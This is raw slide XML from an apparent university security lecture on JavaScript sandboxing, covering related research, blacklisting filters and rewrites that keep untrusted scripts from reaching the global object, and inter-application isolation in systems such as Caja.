              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>[Sands,Phung,Chudnov’09] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>Lightweight, self protecting JavaScript.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Aspect-oriented wrapping of DOM to enforce user-defined safety policies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>[Jensen,Møller,Thiemann’09] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>Type analysis for JavaScript.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Abstract-interpretation based analysis to detect basic type errors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>[Chugh,Meister,Jhala,Lerner’09] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>Staged information flow for JavaScript.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Static information flow analysis plus run-time checks for integrity and confidentiality.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>[Livshits, Guarnieri’09] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>GateKeeper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>: Mostly static enforcement of security and reliability policies for JavaScript code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Enforcing policies by filtering and rewriting based on call-graph and points-to analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Web Sandbox (Scott Isaacs).  Based on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>BrowserShield</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Rewriting and run-time monitoring with performance penalty. </a:t>
            </a:r>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49</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Web security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad sites with bad content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Good sites with bad content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript Sandboxing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Impact on practice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> FBJS,  Yahoo! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ADSafe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Challenge: inter-application isolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Caja</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Conclusions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many opportunities for  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>theory + practice</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6492875"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>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a:xfrm>
            <a:off x="6248400" y="6492875"/>
            <a:ext cx="2438400" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="Gill Sans" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>http://seclab.stanford.edu     </a:t>
            </a:r>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6492875"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>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50</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51</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Function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Can declare a function using "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>varName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>=new Function([param1Name, param2Name,...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>paramNName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>functionBody</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t> Example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> add=new Function("a", "b", "return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>a+b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Constructor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>, every object has a constructor property that refers to the constructor function that initializes the object.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>But see, e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://joost.zeekat.nl/constructors-considered-mildly-confusing.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600"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52</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JavaScript Blacklisting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Prevent access to properties from some set B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Recall:  explicit access is x, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>e.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, or e1[e2]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rename x but not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>e.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> // cannot rename native properties because these are defined outside the app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="860000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Filter 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disallow all expressions that contain an identifier from set B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="860000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Filter 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disallow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>constructor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Constructor provides access to Function because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>f.constructor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> === Function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="860000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rewrite 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rewrite e1[e2] to e1[IDX(e2)]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="860000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>but</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> IDX uses $, so need additional filter:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="860000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Filter 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disallow identifier beginning with $</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> this defines J(B); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>thm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> in Sergio slides is in W2SP paper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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53</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access to global object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="860000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rewrite 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Rewrite every occurrence of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to (this==$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>g?null;this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) where $g is a blacklisted global variable, initialized to the global object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="860000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wrap native methods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, e.g.,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Object.prototype.valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = function(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> $= $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OPvalueOf.call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(this);      // call original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fctn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	return ($==$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>g?null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:$)                 // return if not $g</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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54</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Problem with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>sort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>reverse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These are return arrays if called on arrays, but return global object if called on global object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>valueOf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="folHlink"/>
              </a:solidFill>
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Similar, but for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>object.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> – return global if called on global object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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55</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Isolate apps from each other?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0" smtClean="0"/>
              <a:t>Can achieve partial isolation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Cannot rename properties of native objects:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>   NaN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Innity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>undened</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>parseInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>parseFloat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>IsNaN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>IsFinite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Boolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Date</a:t>
            </a:r>
            <a:r>
